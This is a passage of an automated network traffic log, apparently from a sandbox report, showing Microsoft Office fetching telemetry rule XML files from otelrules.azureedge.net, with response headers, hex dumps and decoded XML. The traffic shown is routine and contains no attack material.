                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        97192.168.2.44984713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:42 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:42 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:42 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1389
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                        x-ms-request-id: 26f9b3b7-001e-008d-64ab-42d91e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114842Z-174f7845968frfdmhC1EWRxxbw00000011hg000000000bfd
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:42 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        98192.168.2.44984913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:42 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:42 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:42 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1405
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                        x-ms-request-id: fdde8523-d01e-0028-578c-3f7896000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114842Z-174f7845968kdththC1EWRzvxn0000000dug0000000017ev
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:42 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        99192.168.2.44985113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:42 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:42 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:42 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1401
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                        ETag: "0x8DC582BE055B528"
                                                                                        x-ms-request-id: e9f7249a-b01e-00ab-72be-42dafd000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114842Z-174f7845968kdththC1EWRzvxn0000000dmg00000000arh8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:42 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        100192.168.2.44984813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:42 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:42 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:42 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1352
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                        x-ms-request-id: fd34d427-b01e-0001-7ca1-4246e2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114842Z-174f7845968kvnqxhC1EWRmf3g0000000n8g000000001x79
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:42 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        101192.168.2.44985013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:42 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:42 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:42 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1368
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                        x-ms-request-id: 8d8a3cd7-301e-001f-2922-41aa3a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114842Z-174f7845968psccphC1EWRuz9s00000011mg000000006hbq
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:42 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        102192.168.2.44985213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:44 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:44 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:44 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1364
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE1223606"
                                                                                        x-ms-request-id: 2ff5ce10-101e-0017-5791-3f47c7000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114844Z-174f78459685726chC1EWRsnbg00000011f0000000004abv
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:44 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        103192.168.2.44985413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:44 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:44 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:44 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1360
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                        x-ms-request-id: 5a810e9b-b01e-003d-75b4-42d32c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114844Z-174f7845968pght8hC1EWRyvxg00000004d000000000an43
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:44 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        104192.168.2.44985513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:44 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:44 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:44 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1403
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                        x-ms-request-id: 580008bf-301e-0000-1d8a-3feecc000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114844Z-174f7845968ljs8phC1EWRe6en000000119g000000002deq
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:44 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        105192.168.2.44985313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:44 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:44 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:44 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1397
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                        ETag: "0x8DC582BE7262739"
                                                                                        x-ms-request-id: 13f42ca4-401e-000a-561c-414a7b000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114844Z-174f7845968qj8jrhC1EWRh41s000000119g00000000764b
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:44 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        106192.168.2.44985613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:44 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:45 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:44 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1366
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                        x-ms-request-id: ce4b1eeb-d01e-007a-68af-42f38c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114844Z-174f784596886s2bhC1EWR743w00000011cg000000006wcy
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:45 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        107192.168.2.44985713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:46 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:47 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1397
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                        x-ms-request-id: 6e1934d2-a01e-006f-595c-3f13cd000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114846Z-174f7845968cdxdrhC1EWRg0en00000011cg0000000037e3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
